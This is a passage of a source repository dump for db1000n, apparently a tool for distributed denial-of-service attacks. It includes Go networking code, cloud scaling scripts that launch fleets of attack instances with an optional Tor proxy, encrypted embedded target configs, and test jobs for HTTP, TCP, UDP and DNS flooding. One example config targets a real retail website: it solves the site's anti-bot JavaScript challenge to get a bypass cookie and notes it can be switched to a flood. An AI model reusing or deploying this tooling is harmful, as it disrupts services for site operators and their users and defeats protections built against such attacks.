a.metrics) 42 | } 43 | 44 | func newAccumulator(jobID string, data *Metrics) *Accumulator { 45 | res := &Accumulator{ 46 | jobID: jobID, 47 | metrics: data, 48 | } 49 | 50 | for s := RequestsAttemptedStat; s < NumStats; s++ { 51 | res.stats[s] = make(map[string]uint64) 52 | } 53 | 54 | return res 55 | } 56 | -------------------------------------------------------------------------------- /src/utils/utils_unix.go: -------------------------------------------------------------------------------- 1 | //go:build !windows 2 | // +build !windows 3 | 4 | package utils 5 | 6 | import ( 7 | "net" 8 | "syscall" 9 | 10 | sys "golang.org/x/sys/unix" 11 | ) 12 | 13 | func UpdateRLimit() error { 14 | var rLimit sys.Rlimit 15 | 16 | err := sys.Getrlimit(sys.RLIMIT_NOFILE, &rLimit) 17 | if err != nil { 18 | return err 19 | } 20 | 21 | rLimit.Cur = rLimit.Max 22 | 23 | return sys.Setrlimit(sys.RLIMIT_NOFILE, &rLimit) 24 | } 25 | 26 | func getSockaddrByName(name string) syscall.Sockaddr { 27 | ief, err := net.InterfaceByName(name) 28 | if err != nil { 29 | return nil 30 | } 31 | 32 | addrs, err := ief.Addrs() 33 | if err != nil { 34 | return nil 35 | } 36 | 37 | for _, addr := range addrs { 38 | ipNet, ok := addr.(*net.IPNet) 39 | if !ok { 40 | continue 41 | } 42 | 43 | if ipBytes := ipNet.IP.To4(); ipBytes != nil { 44 | var sa4 syscall.SockaddrInet4 45 | 46 | copy(sa4.Addr[:], ipBytes) 47 | 48 | return &sa4 49 | } else if ipBytes := ipNet.IP.To16(); ipBytes != nil { 50 | var sa16 syscall.SockaddrInet6 51 | 52 | copy(sa16.Addr[:], ipBytes) 53 | sa16.ZoneId = uint32(ief.Index) 54 | 55 | return &sa16 56 | } 57 | } 58 | 59 | return nil 60 | } 61 | 62 | func BindToInterface(name string) func(network, address string, conn syscall.RawConn) error { 63 | return func(network, address string, conn syscall.RawConn) error { 64 | sockAddr := getSockaddrByName(name) 65 | if sockAddr == nil { 66 | return nil 67 | } 68 | 69 | var operr error 70 | 71 | if err := conn.Control(func(fd uintptr) { 72 | operr = syscall.Bind(int(fd), sockAddr) 73 | }); err != nil { 74 | return err 75 | } 76 | 77 | return operr 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /src/job/config/updater.go: -------------------------------------------------------------------------------- 1 | package config 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "flag" 7 | "os" 8 | "time" 9 | 10 | "go.uber.org/zap" 11 | 12 | "github.com/Arriven/db1000n/src/utils" 13 | ) 14 | 15 | // NewUpdaterOptionsWithFlags returns updater options initialized with command line flags. 16 | func NewUpdaterOptionsWithFlags() (updaterMode *bool, destinationPath *string) { 17 | return flag.Bool("updater-mode", utils.GetEnvBoolDefault("UPDATER_MODE", false), "Only run config updater"), 18 | flag.String("updater-destination-config", utils.GetEnvStringDefault("UPDATER_DESTINATION_CONFIG", "config/config.json"), 19 | "Destination config file to write (only applies if updater-mode is enabled") 20 | } 21 | 22 | func UpdateLocal(logger *zap.Logger, destinationPath string, configPaths []string, backupConfig []byte, skipEncrypted bool) { 23 | lastKnownConfig := &RawMultiConfig{Body: backupConfig} 24 | 25 | for { 26 | rawConfig := FetchRawMultiConfig(context.Background(), logger, configPaths, lastKnownConfig, skipEncrypted) 27 | if !bytes.Equal(lastKnownConfig.Body, rawConfig.Body) { 28 | if err := writeConfig(logger, rawConfig.Body, destinationPath); err != nil { 29 | logger.Error("error writing config", zap.Error(err)) 30 | 31 | return 32 | } 33 | } 34 | 35 | time.Sleep(1 * time.Minute) 36 | } 37 | } 38 | 39 | func writeConfig(logger *zap.Logger, body []byte, destinationPath string) error { 40 | file, err := os.Create(destinationPath) 41 | if err != nil { 42 | return err 43 | } 44 | 45 | defer file.Close() 46 | 47 | size, err := file.Write(body) 48 | if err != nil { 49 | return err 50 | } 51 | 52 | logger.Info("Saved file", zap.String("destination", destinationPath), zap.Int("size", size)) 53 | 54 | return nil 55 | } 56 | -------------------------------------------------------------------------------- /ansible/aws/aws-provisioning.yaml: -------------------------------------------------------------------------------- 1 | - name: Prepare AWS account and create instances 2 | hosts: localhost 3 | gather_facts: false 4 | 5 | tasks: 6 | - name: "Add SSH key" 7 | tags: 8 | - aws 9 | amazon.aws.ec2_key: 10 | name: AWS 11 | key_material: "{{ lookup('file', 'AWS.pub') }}" 12 | 13 | - name: "Create SG with allowed management traffic" 14 | tags: 15 | - aws 16 | amazon.aws.ec2_group: 17 | name: ddos 18 | description: Allows management traffic 19 | rules: 20 | - rule_desc: SSH 21 | cidr_ip: 0.0.0.0/0 22 | proto: tcp 23 | from_port: 22 24 | to_port: 22 25 | - rule_desc: RDP 26 | cidr_ip: 0.0.0.0/0 27 | proto: tcp 28 | from_port: 3389 29 | to_port: 3389 30 | 31 | - name: "Create Linux instance" 32 | tags: 33 | - linux 34 | amazon.aws.ec2_instance: 35 | name: Linux 36 | state: running 37 | instance_type: t2.micro 38 | security_group: ddos 39 | image_id: ami-0ae4d073cedc64830 40 | key_name: "AWS" 41 | network: 42 | assign_public_ip: true 43 | 44 | - name: "Create Windows instance" 45 | tags: 46 | - windows 47 | amazon.aws.ec2_instance: 48 | name: Windows 49 | state: running 50 | instance_type: t2.micro 51 | security_group: ddos 52 | image_id: ami-06aa8ca602578e4a4 53 | key_name: "AWS" 54 | network: 55 | assign_public_ip: true 56 | user_data: 57 | echo {{ lookup('file', 'AWS.pub') }} > $env:ProgramData\ssh\administrators_authorized_keys 58 | 59 | -------------------------------------------------------------------------------- /examples/config/advanced/qrator.yaml: -------------------------------------------------------------------------------- 1 | # it is here for educational purposes only and is meant to showcase the capabilities of the tool 2 | jobs: 3 | - type: sequence 4 | args: 5 | jobs: 6 | - type: set-value 7 | name: useragent 8 | args: 9 | value: "{{ random_user_agent }}" 10 | - type: http-request 11 | name: initial 12 | args: 13 | request: 14 | method: GET 15 | path: https://www.citilink.ru 16 | headers: 17 | User-Agent: '{{ .Value (ctx_key "data.useragent") }}' 18 | Accept: "text/html" 19 | Accept-Language: "en-US" 20 | Connection: "keep-alive" 21 | - type: set-value 22 | name: source 23 | args: 24 | value: '{{ index (.Value (ctx_key "data.initial")) "response" "body" }}' 25 | - type: set-value 26 | name: extract-script 27 | args: 28 | value: '{{ index (split (index (split (.Value (ctx_key "data.source")) "function() {") 1) "var config") 0 }}' 29 | - type: js 30 | name: exec-script 31 | args: 32 | script: '{{ .Value (ctx_key "data.extract-script") }}' 33 | - type: http-request # replace it with http or parallel for some flood 34 | name: final 35 | args: 36 | request: 37 | method: GET 38 | path: https://www.citilink.ru 39 | headers: 40 | User-Agent: '{{ .Value (ctx_key "data.useragent") }}' 41 | cookies: 42 | _pcl: '{{ .Value (ctx_key "data.exec-script") }}' 43 | - type: log 44 | args: 45 | text: 'result: {{ .Value (ctx_key "data.final") }}' 46 | -------------------------------------------------------------------------------- /kubernetes/helm-charts/templates/deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: {{ include "db1000n.fullname" . }} 5 | labels: 6 | {{- include "db1000n.labels" . | nindent 4 }} 7 | spec: 8 | replicas: {{ .Values.replicaCount }} 9 | selector: 10 | matchLabels: 11 | {{- include "db1000n.selectorLabels" . | nindent 6 }} 12 | template: 13 | metadata: 14 | {{- with .Values.podAnnotations }} 15 | annotations: 16 | {{- toYaml . | nindent 8 }} 17 | {{- end }} 18 | labels: 19 | {{- include "db1000n.selectorLabels" . | nindent 8 }} 20 | spec: 21 | {{- with .Values.imagePullSecrets }} 22 | imagePullSecrets: 23 | {{- toYaml . | nindent 8 }} 24 | {{- end }} 25 | securityContext: 26 | {{- toYaml .Values.podSecurityContext | nindent 8 }} 27 | containers: 28 | - name: {{ .Chart.Name }} 29 | securityContext: 30 | {{- toYaml .Values.securityContext | nindent 12 }} 31 | image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}" 32 | env: 33 | {{- range .Values.envVars }} 34 | - name: {{ .name | quote }} 35 | value: {{ .value | quote }} 36 | {{- end }} 37 | imagePullPolicy: {{ .Values.image.pullPolicy }} 38 | resources: 39 | {{- toYaml .Values.resources | nindent 12 }} 40 | {{- with .Values.nodeSelector }} 41 | nodeSelector: 42 | {{- toYaml . | nindent 8 }} 43 | {{- end }} 44 | {{- with .Values.affinity }} 45 | affinity: 46 | {{- toYaml . | nindent 8 }} 47 | {{- end }} 48 | {{- with .Values.tolerations }} 49 | tolerations: 50 | {{- toYaml . | nindent 8 }} 51 | {{- end }} 52 | -------------------------------------------------------------------------------- /.github/workflows/golangci-lint.yaml: -------------------------------------------------------------------------------- 1 | name: golangci-lint 2 | on: 3 | push: 4 | tags: 5 | - v* 6 | branches: 7 | - master 8 | - main 9 | pull_request: 10 | paths: 11 | - "src/**" 12 | - "main.go" 13 | - "go.mod" 14 | - "go.sum" 15 | - ".github/workflows/golangci-lint.yaml" 16 | permissions: 17 | contents: read 18 | # Optional: allow read access to pull request. Use with `only-new-issues` option. 19 | # pull-requests: read 20 | jobs: 21 | golangci: 22 | name: lint 23 | runs-on: ubuntu-latest 24 | steps: 25 | - uses: actions/checkout@v2 26 | - name: Set up Go 27 | uses: actions/setup-go@v2 28 | with: 29 | go-version: 1.18 30 | - name: golangci-lint 31 | uses: golangci/golangci-lint-action@v2 32 | with: 33 | # Optional: version of golangci-lint to use in form of v1.2 or v1.2.3 or `latest` to use the latest version 34 | version: latest 35 | 36 | # Optional: working directory, useful for monorepos 37 | # working-directory: somedir 38 | 39 | # Optional: golangci-lint command line arguments. 40 | # args: --issues-exit-code=0 41 | 42 | # Optional: show only new issues if it's a pull request. The default value is `false`. 43 | # only-new-issues: true 44 | 45 | # Optional: if set to true then the all caching functionality will be complete disabled, 46 | # takes precedence over all other caching options. 47 | # skip-cache: true 48 | 49 | # Optional: if set to true then the action don't cache or restore ~/go/pkg. 50 | # skip-pkg-cache: true 51 | 52 | # Optional: if set to true then the action don't cache or restore ~/.cache/go-build. 53 | # skip-build-cache: true 54 | -------------------------------------------------------------------------------- /.github/workflows/release-docker-advanced.yaml: -------------------------------------------------------------------------------- 1 | # This workflow uses actions that are not certified by GitHub. 2 | # They are provided by a third-party and are governed by 3 | # separate terms of service, privacy policy, and support 4 | # documentation. 5 | 6 | name: Publish Advanced Docker image 7 | 8 | on: 9 | push: 10 | tags: ["**"] 11 | 12 | jobs: 13 | push_to_registry: 14 | name: Push Docker image to Docker Hub 15 | runs-on: ubuntu-latest 16 | steps: 17 | - name: Check out the repo 18 | uses: actions/checkout@v2 19 | 20 | - name: Set up QEMU 21 | uses: docker/setup-qemu-action@v1 22 | 23 | - name: Set up Docker Buildx 24 | uses: docker/setup-buildx-action@v1 25 | 26 | - name: Log in to Docker Hub 27 | run: echo "${{ secrets.GITHUB_TOKEN }}" | docker login ghcr.io -u ${{ github.actor }} --password-stdin 28 | 29 | - name: Extract metadata (tags, labels) for Docker 30 | id: meta 31 | uses: docker/metadata-action@98669ae865ea3cffbcbaa878cf57c20bbf1c6c38 32 | with: 33 | images: ghcr.io/${{ github.repository_owner }}/db1000n-advanced 34 | 35 | - name: Build and push Docker image 36 | uses: docker/build-push-action@ad44023a93711e3deb337508980b4b5e9bcdc5dc 37 | with: 38 | context: . 39 | platforms: linux/amd64,linux/arm64,linux/arm/v7 40 | push: true 41 | target: advanced 42 | tags: ${{ steps.meta.outputs.tags }} 43 | labels: ${{ steps.meta.outputs.labels }} 44 | build-args: | 45 | "ENCRYPTION_KEYS=${{ secrets.ENCRYPTION_KEYS }}" 46 | "CA_PATH_VALUE=${{ secrets.PROMETHEUS_ROOT_CA }}" 47 | "PROMETHEUS_BASIC_AUTH=${{ secrets.PROMETHEUS_BASIC_AUTH }}" 48 | "DEFAULT_CONFIG_VALUE=${{ secrets.DEFAULT_CONFIG }}" 49 | "DEFAULT_CONFIG_PATH=${{ secrets.DEFAULT_CONFIG_PATH }}" 50 | -------------------------------------------------------------------------------- /src/utils/metrics/stats.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | import ( 4 | "sort" 5 | 6 | "go.uber.org/zap/zapcore" 7 | ) 8 | 9 | type ( 10 | // Stat is the type of statistical metrics. 11 | Stat int 12 | // Stats contains all metrics packed as an array. 13 | Stats [NumStats]uint64 14 | // PerTargetStats is a map of Stats per target. 15 | PerTargetStats map[string]Stats 16 | ) 17 | 18 | const ( 19 | RequestsAttemptedStat Stat = iota 20 | RequestsSentStat 21 | ResponsesReceivedStat 22 | BytesSentStat 23 | BytesReceivedStat 24 | 25 | NumStats 26 | ) 27 | 28 | func (ts PerTargetStats) sortedTargets() []string { 29 | res := make([]string, 0, len(ts)) 30 | for k := range ts { 31 | res = append(res, k) 32 | } 33 | 34 | sort.Strings(res) 35 | 36 | return res 37 | } 38 | 39 | func Diff(lhs, rhs Stats) Stats { 40 | var res Stats 41 | for i := range res { 42 | res[i] = lhs[i] - rhs[i] 43 | } 44 | 45 | return res 46 | } 47 | 48 | func (ts PerTargetStats) Diff(other PerTargetStats) PerTargetStats { 49 | if other == nil { 50 | return ts 51 | } 52 | 53 | res := make(PerTargetStats) 54 | for k := range ts { 55 | res[k] = Diff(ts[k], other[k]) 56 | } 57 | 58 | return res 59 | } 60 | 61 | // MarshalLogObject is required to log PerTargetStats objects to zap 62 | func (ts PerTargetStats) MarshalLogObject(enc zapcore.ObjectEncoder) error { 63 | for _, tgt := range ts.sortedTargets() { 64 | tgtStats := ts[tgt] 65 | 66 | if err := enc.AddObject(tgt, &tgtStats); err != nil { 67 | return err 68 | } 69 | } 70 | 71 | return nil 72 | } 73 | 74 | // MarshalLogObject is required to log Stats objects to zap 75 | func (stats *Stats) MarshalLogObject(enc zapcore.ObjectEncoder) error { 76 | enc.AddUint64("requests_attempted", stats[RequestsAttemptedStat]) 77 | enc.AddUint64("requests_sent", stats[RequestsSentStat]) 78 | enc.AddUint64("responses_received", stats[ResponsesReceivedStat]) 79 | enc.AddUint64("bytes_sent", stats[BytesSentStat]) 80 | enc.AddUint64("bytes_received", stats[BytesReceivedStat]) 81 | 82 | return nil 83 | } 84 | -------------------------------------------------------------------------------- /kubernetes/helm-charts/templates/_helpers.tpl: -------------------------------------------------------------------------------- 1 | {{/* 2 | Expand the name of the chart. 3 | */}} 4 | {{- define "db1000n.name" -}} 5 | {{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" }} 6 | {{- end }} 7 | 8 | {{/* 9 | Create a default fully qualified app name. 10 | We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec). 11 | If release name contains chart name it will be used as a full name. 12 | */}} 13 | {{- define "db1000n.fullname" -}} 14 | {{- if .Values.fullnameOverride }} 15 | {{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" }} 16 | {{- else }} 17 | {{- $name := default .Chart.Name .Values.nameOverride }} 18 | {{- if contains $name .Release.Name }} 19 | {{- .Release.Name | trunc 63 | trimSuffix "-" }} 20 | {{- else }} 21 | {{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" }} 22 | {{- end }} 23 | {{- end }} 24 | {{- end }} 25 | 26 | {{/* 27 | Create chart name and version as used by the chart label. 28 | */}} 29 | {{- define "db1000n.chart" -}} 30 | {{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" }} 31 | {{- end }} 32 | 33 | {{/* 34 | Common labels 35 | */}} 36 | {{- define "db1000n.labels" -}} 37 | helm.sh/chart: {{ include "db1000n.chart" . }} 38 | {{ include "db1000n.selectorLabels" . }} 39 | {{- if .Chart.AppVersion }} 40 | app.kubernetes.io/version: {{ .Chart.AppVersion | quote }} 41 | {{- end }} 42 | app.kubernetes.io/managed-by: {{ .Release.Service }} 43 | {{- end }} 44 | 45 | {{/* 46 | Selector labels 47 | */}} 48 | {{- define "db1000n.selectorLabels" -}} 49 | app.kubernetes.io/name: {{ include "db1000n.name" . }} 50 | app.kubernetes.io/instance: {{ .Release.Name }} 51 | {{- end }} 52 | 53 | {{/* 54 | Create the name of the service account to use 55 | */}} 56 | {{- define "db1000n.serviceAccountName" -}} 57 | {{- if .Values.serviceAccount.create }} 58 | {{- default (include "db1000n.fullname" .) .Values.serviceAccount.name }} 59 | {{- else }} 60 | {{- default "default" .Values.serviceAccount.name }} 61 | {{- end }} 62 | {{- end }} 63 | -------------------------------------------------------------------------------- /terraform/aws_ec2/variables.tf: -------------------------------------------------------------------------------- 1 | # Default AWS provider vars 2 | variable "region" { 3 | type = string 4 | description = "AWS Region" 5 | } 6 | 7 | variable "name" { 8 | type = string 9 | description = "name of deployment" 10 | } 11 | 12 | variable "arch_ami" { 13 | type = string 14 | description = "architecture of the ami" 15 | default = "arm64" 16 | } 17 | 18 | 19 | variable "instance_type" { 20 | type = string 21 | description = "Instance type" 22 | default = "t4g.micro" 23 | } 24 | 25 | variable "max_size" { 26 | type = number 27 | description = "Max size of autoscale group" 28 | } 29 | 30 | variable "min_size" { 31 | type = number 32 | description = "Min size of autoscale group" 33 | } 34 | 35 | 36 | # Mixed instances policy part 37 | variable "desired_capacity" { 38 | type = number 39 | description = "number of instances to run" 40 | default = 30 41 | } 42 | 43 | variable "zones" { 44 | type = number 45 | description = "number of availability zones" 46 | default = 2 47 | } 48 | 49 | # if you have multiple aws accounts you are managing with 50 | # terraform eg with aws-vault, specify your auth profile here. 51 | # leave null to use default profile 52 | variable "profile" { 53 | type = string 54 | description = "aws auth profile" 55 | default = null 56 | } 57 | 58 | variable "allow_ssh" { 59 | type = bool 60 | description = "allow port 22 access to proxy and db1000n instances" 61 | default = true 62 | } 63 | 64 | # Optional. I use this to set ec2-user's password, enabling serial port 65 | # access to ec2 instances via the AWS console, even for instances in private 66 | # networks. IMHO this is more secure than exposing port 22 to the outside world 67 | # example: "usermod --password ec2-user" 68 | variable "extra_startup_script" { 69 | type = string 70 | description = "commands to append to instance startup script" 71 | default = "" 72 | } 73 | 74 | variable "enable_tor_proxy" { 75 | type = bool 76 | description = "create tor proxy for outbound connections" 77 | default = false 78 | } -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | APP_NAME := db1000n 2 | 3 | ifeq ($(GOOS),windows) 4 | APP_NAME := $(addsuffix .exe,$(APP_NAME)) 5 | endif 6 | 7 | REPOSITORY_BASE_PATH := github.com/Arriven/db1000n 8 | LATEST_TAG := $(shell git describe --tags --abbrev=0) 9 | 10 | # Remove debug information (ELF) to strip the binary size 11 | LDFLAGS += -s -w 12 | 13 | ifneq ($(LATEST_TAG),) 14 | LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/utils/ota.Version=$(LATEST_TAG)' 15 | endif 16 | ifneq ($(ENCRYPTION_KEYS),) 17 | LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/utils.EncryptionKeys=$(ENCRYPTION_KEYS)' 18 | BUILD_TAGS += encrypted 19 | endif 20 | ifneq ($(DEFAULT_CONFIG_VALUE),) 21 | LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/job/config.DefaultConfig=$(DEFAULT_CONFIG_VALUE)' 22 | endif 23 | ifneq ($(DEFAULT_CONFIG_PATH),) 24 | LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/job.DefaultConfigPathCSV=$(DEFAULT_CONFIG_PATH)' 25 | endif 26 | ifneq ($(CA_PATH_VALUE),) 27 | LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/utils/metrics.PushGatewayCA=$(CA_PATH_VALUE)' 28 | endif 29 | ifneq ($(PROMETHEUS_BASIC_AUTH),) 30 | LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/utils/metrics.BasicAuth=$(PROMETHEUS_BASIC_AUTH)' 31 | endif 32 | 33 | build: 34 | CGO_ENABLED=0 go build -ldflags="${LDFLAGS}" -tags="${BUILD_TAGS}" -o $(APP_NAME) -a ./main.go 35 | 36 | build_encrypted: build 37 | 38 | encrypt_config: 39 | @if [ "$(DEFAULT_CONFIG)" = "" ]; then \ 40 | echo "Not specified DEFAULT_CONFIG"; \ 41 | else \ 42 | file=`tempfile` && \ 43 | age --encrypt -p --output $${file} $(DEFAULT_CONFIG) && \ 44 | echo "Saved in file: $${file}"; \ 45 | config=`cat $${file} | base64 | tr -d '\n'` && \ 46 | echo "Save value as env variable: \nexport DEFAULT_CONFIG_VALUE='$${config}'"; \ 47 | fi 48 | 49 | encrypt_ca: 50 | @if [ "$(CA_PATH)" = "" ]; then \ 51 | echo "Not specified CA_PATH"; \ 52 | else \ 53 | file=`tempfile` && \ 54 | age --encrypt -p --output $${file} $(CA_PATH) && \ 55 | echo "Saved in file: $${file}"; \ 56 | config=`cat $${file} | base64 | tr -d '\n'` && \ 57 | echo "Save value as env variable: \nexport CA_PATH_VALUE='$${config}'"; \ 58 | fi 59 | 60 | docker_build: 61 | @docker build -t "ghcr.io/arriven/db1000n" -f Dockerfile . -------------------------------------------------------------------------------- /terraform/aws_eks/main.tf: -------------------------------------------------------------------------------- 1 | # Define local variables 2 | locals { 3 | cluster_version = "1.21" 4 | cluster_name = "eks-${var.project}" 5 | } 6 | 7 | # Create VPC network 8 | module "network" { 9 | source = "./modules/network" 10 | 11 | name = "vpc-${var.project}" 12 | tags = { 13 | "kubernetes.io/cluster/eks-${var.project}" = "shared" 14 | } 15 | } 16 | 17 | # Create EKS cluster 18 | module "eks_cluster" { 19 | source = "./modules/eks-cluster" 20 | 21 | cluster_name = local.cluster_name 22 | cluster_version = local.cluster_version 23 | vpc_id = module.network.vpc_id 24 | subnets = module.network.private_subnet_ids 25 | source_security_groups = module.eks_nodes.security_group_id 26 | } 27 | 28 | # Create EKS nodes 29 | module "eks_nodes" { 30 | source = "./modules/eks-nodes" 31 | 32 | autoscale_group_name = "eks-${var.project}-node" 33 | cluster_name = local.cluster_name 34 | cluster_version = local.cluster_version 35 | cluster_endpoint = module.eks_cluster.endpoint 36 | cluster_ca_data = module.eks_cluster.ca_data 37 | vpc_id = module.network.vpc_id 38 | subnets = module.network.private_subnet_ids 39 | source_security_groups = module.eks_cluster.security_group_id 40 | key_name = var.key_name 41 | public_key = file(var.public_key) 42 | instance_type = var.eks_node_instance_type 43 | desired_capacity = var.eks_node_desired_capacity 44 | max_size = var.eks_node_max_size 45 | min_size = var.eks_node_min_size 46 | } 47 | 48 | # Setup kubernetes 49 | module "kubernetes" { 50 | source = "./modules/kubernetes" 51 | 52 | profile = var.profile 53 | vpc_id = module.network.vpc_id 54 | cluster_name = local.cluster_name 55 | cluster_endpoint = module.eks_cluster.endpoint 56 | cluster_ca_data = module.eks_cluster.ca_data 57 | worker_node_iam_role_arn = module.eks_nodes.worker_node_iam_role_arn 58 | autoscaler_iam_role_arn = module.eks_cluster.autoscaler_iam_role_arn 59 | } -------------------------------------------------------------------------------- /testconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "jobs": [ 3 | { 4 | "type": "encrypted", 5 | "args": { 6 | "format": "json", 7 | "data": "YWdlLWVuY3J5cHRpb24ub3JnL3YxCi0+IHNjcnlwdCB5eCtiMzQ5RWlZRXo4dTNpRE8veHdRIDE4CmYyb2d0YXlnaXptS25sbUJlQUVaUHpRbngwaUdBYUpJRStHbFltdUVNNkUKLS0tIG5oUUVCd041TWJoNWNCQjhvODk4eUFpUldmUFUvaStpanRsdCtWR0RrSVkK2ehc+JYVl+f5VgLKV0mG/J4CQrtHn+FFV5AAcKiLEAjU6MNDaVqBI6Qm9RunLZ51wAA13DLZkPJH39DcsS77H3HmgLpRQ7DMFG2AIDxWysIt2Yi2hVVn9Ogea73twGa8FOpk2kk0Z7NSHCCcpTJd1Db4cwYJiIFaqfBXR+VZtNk3qBgUMStN1CiOyJxvHbnc6tbfeqq042LImKsaLvFzB2y5H/ec9BonHimrP/aZv6dhequs" 8 | } 9 | }, 10 | { 11 | "type": "http", 12 | "args": { 13 | "request": { 14 | "method": "GET", 15 | "path": "http://localhost:8080/test?queryparam=test&s={{ random_uuid }}", 16 | "headers": { 17 | "Authorization": "wtf" 18 | } 19 | }, 20 | "client": { 21 | "proxy_urls": "{{ join get_proxylist \",\" }}" 22 | }, 23 | "interval_ms": 100 24 | } 25 | }, 26 | { 27 | "type": "tcp", 28 | "count": 100, 29 | "args": { 30 | "address": "localhost:9090", 31 | "body": "more_test", 32 | "interval_ms": 1000 33 | } 34 | }, 35 | { 36 | "type": "udp", 37 | "filter": "{{ (.Value (ctx_key \"global\")).EnablePrimitiveJobs }}", 38 | "count": 100, 39 | "args": { 40 | "address": "localhost:9191", 41 | "header": "test", 42 | "body": "more_test", 43 | "interval_ms": 1000 44 | } 45 | }, 46 | { 47 | "type": "http", 48 | "args": { 49 | "request": { 50 | "method": "GET", 51 | "path": "https://127.0.0.1/", 52 | "headers": { 53 | "HOST": "localhost" 54 | } 55 | } 56 | } 57 | }, 58 | { 59 | "type": "dns-blast", 60 | "filter": "{{ (.Value (ctx_key \"global\")).EnablePrimitiveJobs }}", 61 | "args": { 62 | "root_domain": "example.com", 63 | "protocol": "udp", 64 | "seed_domains": ["yahoo.com"], 65 | "parallel_queries": 3, 66 | "interval_ms": 100 67 | } 68 | } 69 | ] 70 | } 71 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/Arriven/db1000n 2 | 3 | go 1.18 4 | 5 | require ( 6 | filippo.io/age v1.0.0 7 | github.com/blang/semver v3.5.1+incompatible 8 | github.com/corpix/uarand v0.1.1 9 | github.com/google/gopacket v1.1.19 10 | github.com/google/uuid v1.3.0 11 | github.com/miekg/dns v1.1.47 12 | github.com/mitchellh/mapstructure v1.4.3 13 | github.com/mjpitz/go-ga v0.0.7 14 | github.com/prometheus/client_golang v1.12.1 15 | github.com/rhysd/go-github-selfupdate v1.2.3 16 | github.com/robertkrimen/otto v0.0.0-20211024170158-b87d35c0b86f 17 | github.com/valyala/fasthttp v1.34.0 18 | go.uber.org/zap v1.21.0 19 | golang.org/x/net v0.0.0-20220225172249-27dd8689420f 20 | golang.org/x/sys v0.0.0-20220227234510-4e6760a101f9 21 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b 22 | h12.io/socks v1.0.3 23 | ) 24 | 25 | require ( 26 | github.com/andybalholm/brotli v1.0.4 // indirect 27 | github.com/beorn7/perks v1.0.1 // indirect 28 | github.com/cespare/xxhash/v2 v2.1.2 // indirect 29 | github.com/golang/protobuf v1.5.2 // indirect 30 | github.com/google/go-github/v30 v30.1.0 // indirect 31 | github.com/google/go-querystring v1.0.0 // indirect 32 | github.com/inconshreveable/go-update v0.0.0-20160112193335-8152e7eb6ccf // indirect 33 | github.com/klauspost/compress v1.15.0 // indirect 34 | github.com/matttproud/golang_protobuf_extensions v1.0.1 // indirect 35 | github.com/prometheus/client_model v0.2.0 // indirect 36 | github.com/prometheus/common v0.32.1 // indirect 37 | github.com/prometheus/procfs v0.7.3 // indirect 38 | github.com/tcnksm/go-gitconfig v0.1.2 // indirect 39 | github.com/ulikunitz/xz v0.5.9 // indirect 40 | github.com/valyala/bytebufferpool v1.0.0 // indirect 41 | go.uber.org/atomic v1.7.0 // indirect 42 | go.uber.org/multierr v1.6.0 // indirect 43 | golang.org/x/crypto v0.0.0-20220214200702-86341886e292 // indirect 44 | golang.org/x/mod v0.4.2 // indirect 45 | golang.org/x/oauth2 v0.0.0-20210514164344-f6687ab2804c // indirect 46 | golang.org/x/text v0.3.7 // indirect 47 | golang.org/x/tools v0.1.6-0.20210726203631-07bc1bf47fb2 // indirect 48 | golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 // indirect 49 | google.golang.org/appengine v1.6.6 // indirect 50 | google.golang.org/protobuf v1.26.0 // indirect 51 | gopkg.in/sourcemap.v1 v1.0.5 // indirect 52 | ) 53 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | set -euo pipefail 4 | 5 | REPO=${REPO:-"Arriven/db1000n"} 6 | INSTALL_OS="unknown" 7 | 8 | case "$OSTYPE" in 9 | solaris*) INSTALL_OS="solaris" ;; 10 | darwin*) INSTALL_OS="darwin" ;; 11 | linux*) INSTALL_OS="linux" ;; 12 | bsd*) INSTALL_OS="bsd" ;; 13 | msys*) INSTALL_OS="windows" ;; 14 | cygwin*) INSTALL_OS="windows" ;; 15 | *) echo "unknown: $OSTYPE"; exit 1 ;; 16 | esac 17 | 18 | if [ -z "${OSARCH+x}" ]; 19 | then 20 | OSARCH=$(uname -m); 21 | fi 22 | 23 | INSTALL_ARCH="unknown" 24 | case "$OSARCH" in 25 | x86_64*) INSTALL_ARCH="amd64" ;; 26 | i386*) INSTALL_ARCH="386" ;; 27 | i686*) INSTALL_ARCH="386" ;; 28 | armv6l) INSTALL_ARCH="armv6" ;; 29 | armv7l) INSTALL_ARCH="armv6" ;; 30 | arm*) INSTALL_ARCH="arm64" ;; 31 | aarch64*) INSTALL_ARCH="arm64" ;; 32 | *) echo "unknown: $OSARCH"; exit 1 ;; 33 | esac 34 | 35 | INSTALL_VERSION="${INSTALL_OS}_${INSTALL_ARCH}" 36 | 37 | BROWSER_DOWNLOAD_URL=$(curl -s "https://api.github.com/repos/${REPO}/releases/latest" | grep "${INSTALL_VERSION}" | grep -Eo 'https://[^\"]*') 38 | CHECKSUM_DOWNLOAD_URL=$(curl -s "https://api.github.com/repos/${REPO}/releases/latest" | grep "checksums" | grep -Eo 'https://[^\"]*') 39 | 40 | ARCHIVE=${BROWSER_DOWNLOAD_URL##*/} 41 | CHECKSUMS_FILE=${CHECKSUM_DOWNLOAD_URL##*/} 42 | 43 | echo "Downloading an archive..." 44 | echo "${BROWSER_DOWNLOAD_URL}" | xargs -n 1 curl -s -L -O 45 | echo "Downloading checksums..." 46 | echo 